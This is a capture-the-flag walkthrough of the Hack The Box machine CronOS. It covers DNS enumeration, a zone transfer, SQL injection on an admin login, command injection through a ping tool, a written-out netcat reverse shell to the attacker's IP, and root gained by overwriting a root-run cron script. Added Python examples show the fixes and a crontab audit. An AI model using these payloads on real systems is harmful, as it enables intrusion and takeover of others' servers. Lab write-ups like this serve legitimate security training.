HTB CronOS

Enumeration

nmap, all ports, full service enumeration

nmap -p- -sV -A <ip> --open -o full-enumerate.nmap

└─$ nmap -p- -sV -A $IP --open -o full-enumerate.nmap       
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 10:48 EDT
Nmap scan report for 10.129.227.211
Host is up (0.034s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.73 seconds

nmap (all identified TCP ports + default scripts & service versions)

nmap -p <1,2,3> -sV --script default --script http-methods --script http-headers <ip> -o <ip>-identified-ports.nmap

└─$ nmap -p 22,53,80 --script default --script http-methods --script http-headers $IP -o identified-ports.nmap
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 10:51 EDT
Nmap scan report for 10.129.227.211
Host is up (0.034s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http
| http-headers: 
|   Date: Sat, 22 Jul 2023 14:51:37 GMT
|   Server: Apache/2.4.18 (Ubuntu)
|   Last-Modified: Fri, 01 Jan 2021 00:29:56 GMT
|   ETag: "2caf-5b7cbd6fbb19d"
|   Accept-Ranges: bytes
|   Content-Length: 11439
|   Vary: Accept-Encoding
|   Connection: close
|   Content-Type: text/html
|   
|_  (Request type: HEAD)
|_http-title: Apache2 Ubuntu Default Page: It works

Nmap done: 1 IP address (1 host up) scanned in 15.98 seconds

nmap (vuln scan)

nmap -p <1,2,3> --script vuln <ip> -o <ip>-vuln.nmap

The vuln scripts flag only a possible Slowloris DoS condition on port 80; nothing else comes back.

Port Enumeration

Port 80

  • Apache2 httpd 2.4.18
    • Whenever I see a default Apache page like this, it tells me there is a configuration issue somewhere worth digging into.


Exploitation

Port 80

Foothold

  1. nslookup DNS recon ⭐
└─$ nslookup
> 10.129.227.211
** server can't find 211.227.129.10.in-addr.arpa: NXDOMAIN
> server 10.129.227.211
Default server: 10.129.227.211
Address: 10.129.227.211#53
> 10.129.227.211
;; communications error to 10.129.227.211#53: timed out
211.227.129.10.in-addr.arpa	name = ns1.cronos.htb.
>
  2. Then we try a DNS zone transfer with dig: dig axfr cronos.htb @10.129.227.211
└─$ dig axfr cronos.htb @10.129.227.211
; <<>> DiG 9.18.16-1-Debian <<>> axfr cronos.htb @10.129.227.211
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.10.10.13
admin.cronos.htb.	604800	IN	A	10.10.10.13
ns1.cronos.htb.		604800	IN	A	10.10.10.13
www.cronos.htb.		604800	IN	A	10.10.10.13
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 92 msec
;; SERVER: 10.129.227.211#53(10.129.227.211) (TCP)
;; WHEN: Sat Jul 22 12:23:21 EDT 2023
;; XFR size: 7 records (messages 1, bytes 203)
  3. We now see a bunch of new hostnames, which again are only reachable after adding them to /etc/hosts:
└─$ cat /etc/hosts      
127.0.0.1	localhost
127.0.1.1	CH.CH	CH
10.129.227.211  cronos.htb admin.cronos.htb ns1.cronos.htb www.cronos.htb
  4. The admin.cronos.htb URL is a login page.

  5. Here we can try a common SQL injection guess in the login form:
    1. user = admin
    2. pass = ' or '1'=1
    3. gets nothing, even with URL encoding, but this is good to check.
  6. SQLmap: grab the whole request made when trying to log in:
POST / HTTP/1.1
Host: admin.cronos.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Origin: http://admin.cronos.htb
DNT: 1
Connection: close
Referer: http://admin.cronos.htb/
Cookie: PHPSESSID=an1b11g14nbpito0le7fsqsr02
Upgrade-Insecure-Requests: 1

username=admin&password=admin
  7. Save it into a file (nano login.request) that we can pass to sqlmap -r login.request

  8. The sqlmap output tells me that the "username" field appears to be injectable, so we can change the username field to something like:
    1. user = admin'-- --
    2. pass = aejtaetajey (doesn't matter)
    3. and we get in
  9. Either way we are taken to http://admin.cronos.htb/welcome.php
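To show what the fix for this login bug looks like, here is an added example (not code from the box or from this write-up) that contrasts a string-built login query with a parameterised one. It uses an in-memory SQLite table as a stand-in for the real backend; the schema, the stored password and the exact query text are assumptions. The admin'-- -- username from the step above gets in through the first function and not the second.

```python
import sqlite3

# Constructed stand-in for the admin.cronos.htb login backend; the real
# schema, credentials and query text are not on the page (assumption).
SCHEMA = """
CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT);
INSERT INTO users VALUES ('admin', 'constructed-demo-password');
"""


def _connect() -> sqlite3.Connection:
    """Fresh in-memory database per call so each check starts clean."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_sql(username: str, password: str) -> str:
    """The query text a string-building login handler would send: the
    inputs are spliced straight into the SQL, so a quote ends the literal
    and '--' comments out the rest, including the password check."""
    return (f"SELECT 1 FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def login_vulnerable(username: str, password: str) -> bool:
    """Runs the string-built query. A malformed query (an unbalanced quote,
    for instance) raises; that is treated as a failed login, which is what
    a user of a typical web app sees as 'nothing happens'."""
    conn = _connect()
    try:
        return conn.execute(vulnerable_sql(username, password)).fetchone() is not None
    except sqlite3.OperationalError:
        return False


def login_hardened(username: str, password: str) -> bool:
    """Parameterised query: the driver binds the values separately from the
    statement text, so quotes and comment markers stay inside the data."""
    conn = _connect()
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    probe = ("admin'-- --", "aejtaetajey")          # the username injection from the write-up
    print(vulnerable_sql(*probe))                   # everything after -- is a comment
    print("vulnerable:", login_vulnerable(*probe))  # True: the password check never runs
    print("hardened:  ", login_hardened(*probe))    # False: no user is literally named admin'-- --
```

The parameterised form is the fix whatever the database engine is; the vulnerable function exists only to make sqlmap's finding on the username field reproducible offline.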

  10. This brings up a Net Tool that runs traceroute and ping, so I tried basic command injection with 8.8.8.8;whoami, which worked.
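Added example, not the Net Tool's own code (which is PHP and is not shown on the page): the shell-string pattern behind this bug, next to a hardened version that allow-lists an IP address or hostname and hands ping an argv list so that no shell ever parses the input. The function names and the ping arguments are assumptions.

```python
import ipaddress
import re
import subprocess

# Constructed inputs: the value the Net Tool expects, and the probe from the
# write-up that turns a single ping into two commands.
BENIGN = "8.8.8.8"
INJECTED = "8.8.8.8;whoami"

# RFC 1123 hostname: dot-separated labels of letters, digits and interior
# hyphens, at most 253 characters. Nothing a shell cares about can match.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)"
    r"(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def vulnerable_command(target: str) -> str:
    """The shape of the bug (assumed; the tool's PHP is not on the page):
    user input glued into one string that a shell will parse, so ';' ends
    the ping and starts whatever follows. Returned here, never executed."""
    return f"ping -c 1 {target}"


def is_valid_target(target: str) -> bool:
    """Allow-list check: a literal IPv4/IPv6 address or a hostname.
    Separators, quotes, '$', backticks and whitespace all fail it."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return _HOSTNAME.match(target) is not None


def safe_ping_argv(target: str) -> list[str]:
    """Hardened form: validate, then build an argv list. Passing a list to
    subprocess without shell=True means the input is one argument to ping
    and nothing else. Raises instead of running anything unsafe."""
    if not is_valid_target(target):
        raise ValueError(f"rejected target: {target!r}")
    return ["ping", "-c", "1", target]


def run_ping(target: str, timeout: float = 5.0) -> int:
    """Runs the hardened command and returns ping's exit status."""
    completed = subprocess.run(safe_ping_argv(target), capture_output=True, timeout=timeout)
    return completed.returncode


if __name__ == "__main__":
    print(vulnerable_command(INJECTED))  # ping -c 1 8.8.8.8;whoami  (two commands to a shell)
    print(safe_ping_argv(BENIGN))        # ['ping', '-c', '1', '8.8.8.8']
    try:
        safe_ping_argv(INJECTED)
    except ValueError as err:
        print(err)                       # rejected target: '8.8.8.8;whoami'
```

Validation alone is not the whole fix: the argv list matters too, because a validated hostname still reaches a shell if the code keeps building one string. Doing both closes the class of bug rather than the one payload.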

  11. Now we can try a reverse shell from here, since we know we are talking directly to the Linux server: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.3 4455 >/tmp/f (the first one from HackTools; make sure to URL encode it if sending it through Burp Suite), and it worked.

Root

crontab

  1. Since this box is called CronOS, I think it's safe to say crontab is going to be involved.
  2. cat /etc/crontab
www-data@cronos:/etc$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#
www-data@cronos:/etc$
  3. We can see that php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1 is running as root every minute.
  4. If I just replace that artisan file with a reverse shell, the cron job should execute it and give me root.

  5. 1…2… skip a few… root!
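Added example, not from the write-up or the box: a small audit a defender can run against /etc/crontab to catch exactly this pattern, a root job whose program, script or parent directory can be modified by a non-root account. It parses the system crontab format shown above and checks ownership and mode bits. The demo builds a throwaway directory tree with a world-writable artisan stand-in, because a test cannot create root-owned files; the function names and the trusted_uid parameter are assumptions.

```python
import os
import re
import shlex
import stat
import tempfile
from pathlib import Path
from typing import Optional


def parse_system_crontab(text: str) -> list[tuple[str, str]]:
    """Return (user, command) pairs from /etc/crontab-format text.
    Comments, blank lines and VAR=value assignments are skipped; both the
    five-field schedule and the @reboot/@daily shorthand are handled."""
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_][A-Za-z0-9_]*=", line):
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)        # @reboot user command
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
            continue
        fields = line.split(None, 6)            # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def paths_in_command(command: str) -> list[str]:
    """Absolute paths a job's command line refers to; redirection
    characters glued to a path ('>>/dev/null') are stripped first."""
    paths = []
    for token in shlex.split(command):
        token = token.lstrip("<>&|;")
        if token.startswith("/") and token != "/":
            paths.append(token)
    return paths


def modifiable_by_untrusted(path: str, trusted_uid: int = 0) -> Optional[str]:
    """Why an account other than trusted_uid could change what this job
    runs, or None. The file and its parent directory are both checked: a
    writable parent lets the file be swapped out even if it is root-owned.
    Missing paths and device nodes (such as /dev/null) are ignored."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    if not (stat.S_ISREG(st.st_mode) or stat.S_ISDIR(st.st_mode)):
        return None
    for candidate, what in ((path, "file"), (os.path.dirname(path), "parent directory")):
        try:
            st = os.stat(candidate)
        except OSError:
            continue
        sticky_dir = stat.S_ISDIR(st.st_mode) and bool(st.st_mode & stat.S_ISVTX)
        if st.st_mode & stat.S_IWOTH and not sticky_dir:
            return f"{what} world-writable"
        if st.st_uid != trusted_uid:
            return f"{what} owned by uid {st.st_uid}"
        if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            return f"{what} group-writable by gid {st.st_gid}"
    return None


def audit_crontab(text: str, trusted_uid: int = 0) -> list[tuple[str, str, str]]:
    """(user, path, reason) for every root job whose program or script an
    untrusted account could modify. trusted_uid is the account cron runs the
    job as: 0 on a real system; demo() passes its own uid instead."""
    findings = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue                             # only root jobs escalate privilege
        for path in paths_in_command(command):
            reason = modifiable_by_untrusted(path, trusted_uid)
            if reason:
                findings.append((user, path, reason))
    return findings


def demo() -> tuple[list[tuple[str, str, str]], str]:
    """Constructed tree mirroring the write-up: a root job running a
    world-writable artisan stand-in next to a harmless run-parts job."""
    base = Path(tempfile.mkdtemp())
    laravel = base / "laravel"
    laravel.mkdir()
    laravel.chmod(0o755)
    artisan = laravel / "artisan"
    artisan.write_text("#!/bin/sh\n")            # stand-in for the Laravel artisan script
    artisan.chmod(0o777)                         # the weakness: anyone can replace its contents
    hourly = base / "cron.hourly"
    hourly.mkdir()
    hourly.chmod(0o755)
    crontab = (
        "SHELL=/bin/sh\n"
        "# m h dom mon dow user command\n"
        f"17 * * * * root cd / && run-parts --report {hourly}\n"
        f"* * * * * root php {artisan} schedule:run >> /dev/null 2>&1\n"
    )
    return audit_crontab(crontab, trusted_uid=os.geteuid()), str(artisan)


if __name__ == "__main__":
    for user, path, reason in demo()[0]:
        print(f"{user} job runs {path}: {reason}")
```

On a real host call audit_crontab(open("/etc/crontab").read()) with the default trusted_uid of 0, and feed it the files under /etc/cron.d the same way. The audit only follows paths that appear literally in the command line; a root job that runs a script which in turn sources other writable files needs the same check applied one level down.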


Lessons Learned

  • nslookup has some wild shit you can do with it for DNS recon
  • make sure to URL encode payloads in Burp Suite
  • IppSec's method here for getting privesc was a lot more tedious and, to be honest, not as easy and did not make as much sense as mine did. Simply replace the file running as root in the crontab with a reverse shell, and ez pz cake.